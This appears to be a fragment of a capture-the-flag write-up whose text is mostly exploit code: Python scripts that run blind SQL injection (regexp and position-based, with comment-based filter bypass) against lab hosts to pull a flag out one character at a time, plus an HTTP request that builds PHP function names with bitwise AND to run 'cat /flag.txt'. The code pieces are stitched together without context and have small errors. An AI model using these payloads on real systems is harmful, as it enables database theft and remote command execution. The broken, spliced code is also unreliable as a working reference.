flag = '0x5e' table = string.ascii_letters + '_' + string.digits table = [ord(i) for i in table] raw_flag = '' for _ in range(100): for i in table: t = flag + hex(i)[2:].rjust(0, '2') #print(t) data = { 'username': '\\', 'password': '||password/**/regexp/**/binary/**/%s#' % t }
res = sess.post(url, data) if'success'in res.text: #print(chr(i)) flag += hex(i)[2:].rjust(0, '2') print(flag) raw_flag += chr(i) print(raw_flag) break
if i == table[-1]: print('WARNGIN')
用 & 绕一下过滤,即可 rce
1 2 3
GET /c2ZtdHFs.php?gzmtu=(sysuem%26sysvem)((currenu%26currenv)((weucmmhecders%26oevennheeders)())) HTTP/1.1 A: cat /flag.txt Host: 172.20.29.102
res = sess.post('http://172.20.29.105/index.php', data=data) #print(res.text) if'hacker'in res.text: print('hacker')
if'Too Young Too Simple'in res.text: flag += chr(i) print(flag) break if i == table[-1]: print('WARNNING')
for _ in range(100): for i in table: t = f'||chr({i})' + to_chr(flag) t = t[2:] data = { 'username': 'admin', 'password': "admin'/**/or/**/'1'/**/and/**/cast(position(%s/**/in/**/(%s))/**/as/**/bool)/**/and/**/'1" % ( t, query) }
res = sess.post('http://172.20.29.105/index.php', data=data) # print(res.text) if'hacker'in res.text: print('hacker')
if'Too Young Too Simple'in res.text: flag = chr(i) + flag print(flag) break if i == table[-1]: print('WARNNING')